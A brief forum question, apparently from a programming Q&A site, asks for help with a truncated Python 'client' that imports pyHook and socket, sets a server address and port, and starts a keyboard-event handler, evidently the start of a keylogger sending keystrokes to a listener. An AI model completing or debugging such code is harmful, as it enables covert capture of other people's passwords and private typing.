Hello, someone can help me with this, they told me, but I do not know how to solve it yet:
Client:
import socket
import pyHook,pythoncom,sys,logging
import threading
servidor = "127.0.0.1"
puerto = 39421
def OnKeyboardEvent(event):
try:...
asked on
07.08.2016 / 17:02